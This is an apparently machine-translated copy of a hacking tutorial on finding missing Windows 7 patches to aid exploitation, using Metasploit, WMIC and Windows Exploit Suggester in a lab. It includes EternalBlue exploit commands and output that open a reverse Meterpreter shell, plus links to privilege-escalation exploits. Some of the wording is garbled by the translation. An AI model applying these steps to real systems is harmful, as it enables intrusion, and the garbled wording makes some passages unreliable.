قالب وردپرس درنا توس
Home / Tips and Tricks / How to identify missing Windows patches for easier exploitation «Zero Byte :: WonderHowTo

How to identify missing Windows patches for easier exploitation «Zero Byte :: WonderHowTo



No operating system battles with as many vulnerabilities as Windows, and it is often a race to release the latest fixes to fix things. From an attacker's point of view, knowledge of which patches are on a Windows machine can make or break successful exploitation. Today, we will cover three methods for enumerating patches, with Metasploit, WMIC and Windows Exploit Suggester.

For Metasploit, we will use a mail module to find missing corrections. With WMIC we will run commands directly from a shell in the system to see technical correction corrections. And with Windows Exploit Suggester, we will compare the installed patches on the system with a database of vulnerabilities. We will use Kali Linux to attack an unmatched version of Windows 7.

Method 1
: Metasploit

The first method we will use to identify any missing patch files on the target is Metasploit. Fire it by typing msfconsole into the terminal.

  ~ # msfconsole

[-] *** Metasploit frame console grid ... /
[-] * WARNING: No database support: No database YAML file
[-] ***

. .
.

dBBBBBBb dBBBP dBBBBBBP dBBBBBb. O
"dB" GDP
dB & # 39; dB & # 39; dB & # 39; dBBP dBP dBP BB
dB & # 39; dB & # 39; dB & # 39; dBP dBP dBP BB
dB & # 39; dB & # 39; dB & # 39; dBBBBP dBP dBBBBBBB

dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB & # 39; dBP dB & # 39; .BP
| dBP dBBBB & # 39; dBP dB & # 39; .BP dBP dBP
--o-- dBP dBP dBP dB & # 39; .BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP

.
.
o To boldly go there no
the shell has gone before

= [ metasploit v5.0.20-dev                          ]
+ - - = [ 1886 exploits - 1065 auxiliary - 328 post       ]
+ - - = [ 546 payloads - 44 encoders - 10 nops            ]
+ - - = [ 2 evasion                                       ]

msf5> 

We have to compromise with the machine and get a Meterpreter session to run the mail module, and since we know this is an unsurpassed version of Windows 7, we can quickly exploit it with EternalBlue.

Load module with command use :

  msf5> use exploit / windows / smb / ms17_010_eternalblue 

Set appropriate options and type run to start exploit: [19659005] msf5 exploit (windows / smb / ms17_010_eternalblue)> run

[*] Started reverse TCP handler 10.10.0.1:1337
[+] 10.10.0.104:445 – Host is probably VARIOUS for MS17-010! – Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.0.104:445 – Connection to target for exploitation.
[+] 10.10.0.104:445 – Connection established for exploitation.
[+] 10.10.0.104:445 – Target OS validly selected for operating system indicated with SMB response
[*] 10.10.0.104:445 – CORE raw buffer dump (42 bytes)
[*] 10.10.0.104:445 – 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.0.104:445 – 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.0.104:445 – 0x00000020 69 63 65 20 50 61 63 6b 20 31 is Pack 1
[+] 10.10.0.104:445 – Goal arc selected as valid for arc indicated by DCE / RPC response
[*] 10.10.0.104:445 – Trying to exploit with 12 groom messages.
[*] 10.10.0.104:445 – Sends everything except the last fragment of the exploit package
[*] 10.10.0.104:445 – Start pooling without p
[+] 10.10.0.104:445 – Send SMBv2 buffers
[+] 10.10.0.104:445 – Closing SMBv1 connection creates free hole next to SMBv2 buffer.
[*] 10.10.0.104:445 – Send final SMBv2 buffers.
[*] 10.10.0.104:445 – Send last fragment of exploit package!
[*] 10.10.0.104:445 – Get answers from exploitation package
[+] 10.10.0.104:445 – ETERNALBLUE overwriting was successfully completed (0xC000000D)!
[*] 10.10.0.104:445 – Send eggs for damaged connection.
[*] 10.10.0.104:445 – Triggered free from damaged buffer.
[*] Transmission step (206403 bytes) to 10.10.0.104
[*] Meterpreter session 1 opened (10.10.0.1:1337 -> 10.10.0.104:49228) at 2019-10-27 12:28:32 -0500
[+] 10.10.0.104:445 – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – =
[+] 10.10.0.104:445 – = – = – = – = – = – = – = – = – = – = – = – = – = – WIN – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – =
[+] 10.10.0.104:445 – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – =

meterpreter>

We now have a meterpreter session on target. Since mail modules work by running an existing session in the background, we must first set the background to our session:

  meterpreter> background

[*] Background Session 1 ... 

Then we can load the module with the command use :

  msf5 exploit (windows / smb / ms17_010_eternalblue)> use post / windows / collect / enum_patches 

If we type options directly, Metasploit will show us all available options and settings for the current module:

  msf5 post (windows / collect / enum_patches)> options

Module options (post / windows / collect / enum_patches):

Name Current setting Mandatory description
------------------- -------- -----------
KB KB2871997, KB2928120 yes A comma separated list of KB patches to look for
MSFLOCALS true yes Search for missing patches for which there is an MSF local module for
SESSION yes The session to run this module. 

All we really need to set is the session number to run this one. We can specify a comma-separated list of additional correction files to search for if we wanted, but for the moment the standard files work well.

Use the command set to set the session number we have in the background:

  msf5 record (windows / collect / enum_patches)> set session 1

session => 1 

And type run to start it:

  msf5 post (windows / collect / enum_patches)> run

[+] KB2871997 is missing
[+] KB2928120 missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d on Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 skelevator on Vista, 7 and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf on XP SP2 / SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, raises from low to medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei about x86 Win7 SP0 / SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0 / SP1
[*] Post Module Execution Completed 

We can see that it returns the first two missing corrections, and it shows some additional potential vulnerabilities and their associated corrections.

Method 2: WMIC

The next method we will use to enumerate patches uses the Windows WMIC tool. WMIC (Windows Management Instrumentation Command-Line) is a tool used to perform WMI operations on Windows. It is used as a sort command and can be run in both interactive and non-interactive modes.

To use this tool, we need a proper shell on the target. Fortunately, we already have a Meterpreter session running, so we can use it to get into a system shell.

Use the command sessions with the -i flag to interact with a session:

  msf5> sessions -i 1

[*] Start interaction with 1 ...

meterpreter> 

This should put us at the Meterpreter prompt – simply enter the shell and we will be released into a system shell:

  meterpreter> shell

Process 2452 created.
Channel 1 was created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) Microsoft Microsoft Corporation 2009. All rights reserved.

C:  Windows  system32> 

Now we should be able to use the WMIC utility to see all the patches that are installed. Enter wmic qfe list at the prompt to list all the fast fixing (QFE) fixes that are in the system:

  C:  Windows  system32> wmic qfe list

wmic qfe list
Caption CS Name Description FixComments HotFixID InstallDate InstalledBy Installed On Name ServicePackInEffect Status
http://support.microsoft.com/?kbid=2534111 W02 Hotfix KB2534111 2/25/2019
http://support.microsoft.com/?kbid=976902 W02 Update KB976902 W02  Administrator 11/21/2010 

This will provide us with the ID, description, installation information and associated URL for the patch files that are installed. We can also thank full to our command for a slightly different view of this data:

  C:  Windows  system32> wmic qfe list full

wmic qfe list full

Caption = http: //support.microsoft.com/ kbid = 2534111
CSName = W02
Description = Hotfix
FixComments =
HotFixID = KB2534111
InstallDate =
InstalledBy =
InstalledOn = 2/25/2019
name =
ServicePackInEffect =
status =

Caption = http: //support.microsoft.com/ kbid = 976.902
CSName = W02
Description = Update
FixComments =
HotFixID = KB976902
InstallDate =
InstalledBy = W02  Administrator
InstalledOn = 11/21/2010
name =
ServicePackInEffect =
Status = 

This method is nice because it requires nothing more than a basic shell on the target to run WMIC.

Method 3: Windows Exploit Suggester

The last method we will use to identify missing patch files is Windows Exploit Suggester. This is a tool written in Python that will compare the correction files installed on a target against a database with Microsoft's vulnerabilities, all from our local machine.

Windows Exploit Suggester requires output from system info from the target to compare it with the database. Since we still need to have scale access to our target, we can run the command:

  C:  Windows  system32> system info

system information

Host Name: W02
OS name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered owner: admin2
Registered Organization:
Product ID: 00371-868-0000007-85704
Original installation date: 25/25/2019, 14:04:46 PM
System start time: 27/7/2019, 13:48:26 PM
System manufacturer: QEMU
System Model: Standard PC (i440FX + PIIX, 1996)
System type: x64-based PC
Processor (s): 1 Processor (s) installed.
[01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~ 2533 Mhz
BIOS version: SeaBIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org, 1/1/2014
Windows directory: C:  Windows
System directory: C:  Windows  system32
Boot Device:  Device  Hard DiskVolume1
System Setup: en-us; English (US)
Input setting: en-us; English (US)
Time Zone: (UTC-06: 00) Central Time (US & Canada)
Total physical memory: 2,047 MB
Physical memory available: 1,461 MB
Virtual memory: Max size: 4 095 MB
Virtual memory: Available: 3,494 MB
Virtual memory: in use: 601 MB
Page file location (s): C:  pagefile.sys
Domain: dlab.env
Login server: Not available
Hotfix (s): 2 Hotfix (s) installed.
[01]: KB2534111
[02]: KB976902
Network card (s): 1 NIC (s) installed.
[01]: Intel (R) PRO / 1000 MT Network Connection
Connection name: Connection to local area
DHCP enabled: Yes
DHCP server: 10.10.0.100
IP address (s)
[01]: 10.10.0.104
[02]: fe80 :: 104: 336c: a632: e39b 

And save the output to a text file on our local machine:

  ~ # cat system_info.txt

Host Name: W02
OS name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered owner: admin2
Registered Organization:
Product ID: 00371-868-0000007-85704
Original installation date: 25/25/2019, 14:04:46 PM
System start time: 27/7/2019, 13:48:26 PM
System manufacturer: QEMU
System Model: Standard PC (i440FX + PIIX, 1996)
System type: x64-based PC
Processor (s): 1 Processor (s) installed.
[01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~ 2533 Mhz
BIOS version: SeaBIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org, 1/1/2014
Windows directory: C:  Windows
System directory: C:  Windows  system32
Boot Device:  Device  Hard DiskVolume1
System Setup: en-us; English (US)
Input setting: en-us; English (US)
Time Zone: (UTC-06: 00) Central Time (US & Canada)
Total physical memory: 2,047 MB
Physical memory available: 1,461 MB
Virtual memory: Max size: 4 095 MB
Virtual memory: Available: 3,494 MB
Virtual memory: in use: 601 MB
Page file location (s): C:  pagefile.sys
Domain: dlab.env
Login server: Not available
Hotfix (s): 2 Hotfix (s) installed.
[01]: KB2534111
[02]: KB976902
Network card (s): 1 NIC (s) installed.
[01]: Intel (R) PRO / 1000 MT Network Connection
Connection name: Connection to local area
DHCP enabled: Yes
DHCP server: 10.10.0.100
IP address (s)
[01]: 10.10.0.104
[02]: fe80 :: 104: 336c: a632: e39b 

Then we have to download the script from GitHub. The easiest way to do that is with wget :

  ~ # wget https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester. py

--2019-10-27 12: 38: 34-- https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
Resolve raw.githubusercontent.com (raw.githubusercontent.com) ... 151.101.148.133
Connects to raw.githubusercontent.com (raw.githubusercontent.com) | 151.101.148.133 |: 443 ... connected.
HTTP request is sent, pending response ... 200 OK
Length: 69175 (68K) [text/plain]
Saves to: 'windows-exploit-suggester.py'

windows-exploit-suggester.py 100% [======================================================================================================================>] 67.55K --.- KB / s of 0.07s

2019-10-27 12:38:34 (951 KB / s) - & # 39; windows-exploit-suggester.py & # 39; saved [69175/69175] 

Then install all dependencies, which in this case are only python-xlrd package:

  ~ # apt-get install python-xlrd

Reading Package Lists ... Ready
Building dependent trees
Reading information about the state ... Ready
The following NEW packages will be installed:
python XLRD
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 104 KB archive.
After this operation, 490 kB of extra disk space will be used.
Get: 1 http://kali.download/kali kali-rolling / main amd64 python-xlrd all 1.1.0-1 [104 kB]
Downloaded 104 kB in 1s (144 kB / s)
Select previously unselected package python-xlrd.
(Reading database ... 408990 files and directories currently installed.)
Preparing to unpack ... / python-xlrd_1.1.0-1_all.deb ...
Unpacking python-xlrd (1.1.0-1) ...
Sets python-xlrd (1.1.0-1) ...
Processing triggers for man-db (2.8.5-2) ... 

Now that the tool is configured, we need to generate Microsoft's security bulletin database. Windows Exploit Suggester can do this automatically with the command update :

  ~ # python windows-exploit-suggester.py - update

[*] initiates winsploit version 3.3 ...
[+] writes to file 2019-10-27-mssb.xls
[*] finished 

We should be good to go at this time. All we need to do is run the tool and specify the system info file from earlier and the database file we just created:

  ~ # python windows-exploit-suggester.py - database 2019-10-27-mssb.xls --systeminfo system_info. txt

[*] initiates winsploit version 3.3 ...
[*] database file is detected as xls or xlsx based on extension
[*] tries to read from the system info file 

The script will run and return any corrections that are missing from our target, along with relevant information and links:

  [+] system info file read successfully (ascii)
[*] Ask database file for potential vulnerabilities
[*] Compare the two quick fixes with the 386 potential bulletins with a database of 137 known exploits
[*] there are now 386 remaining vulnerabilities
[+] [E]   exploitdb PoC, [M] Metasploit module, [*] no bulletin missing
[+] Windows version identified as "Windows 7 SP1 64-bit"
[*]
[E]   MS16-135: Security Update for Windows Kernel Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ - Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ - Microsoft Windows Kernel - & # 39; win32k.sys & # 39; & # 39; NtSetWindowLongPtr & # 39; escalation of privileges (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E]   MS16-098: Security Update for Windows Kernel Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ - Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M]   MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 - Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ - Hot Potato - Windows Privilege Escalation
[*]
[E]   MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ - Windows - gdi32.dll Multiple DIB-related EMF record managers Heap-Based Out-of-Bounds Reads / Memory Disclosure (MS16-074), PoC
[*] https://www.exploit-db.com/exploits/39991/ - Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E]   MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*] https://www.exploit-db.com/exploits/39994/ - Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*]
[E]   MS16-059: Security Update for Windows Media Center (3150220) - Important
[*] https://www.exploit-db.com/exploits/39805/ - Microsoft Windows Media Center - .MCL File Processing Execution Execution (MS16-059), PoC
[*]
[E]   MS16-056: Security Update for Windows Journal (3156761) - Critical
[*] https://www.exploit-db.com/exploits/40881/ - Microsoft Internet Explorer - jscript9 JavaScriptStackWalker Memory Corruption (MS15-056)
[*] http://blog.skylined.nl/20161206001.html - MSIE jscript9 JavaScriptStackWalker Memory Corruption

...

[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Increase in Privilege (2916607) - Important
[E] MS13-101: Vulnerabilities in Windows Core Mode Drivers May Allow Privilege Raising (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update for ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Core Mode Drivers Could Allow Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel Mode Driver Could Allow Raising Privileges (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ - Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ - Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[*]   done 

This method is perhaps the most basic because we use an updated database of patches to compare with the target. It also has the advantage of being able to run remote control.

Wrapping Up

In this tutorial, we examined some methods to identify missing patch files on a Windows machine. First we used a Metasploit mail module to accomplish this, followed by the WMIC tool on Windows, and finally the Windows Exploit Suggester Python script. Enumerating patches is extremely important when you attack Windows, as it reduces the number of potential exploits, saves time and generally just makes it easier.


Source link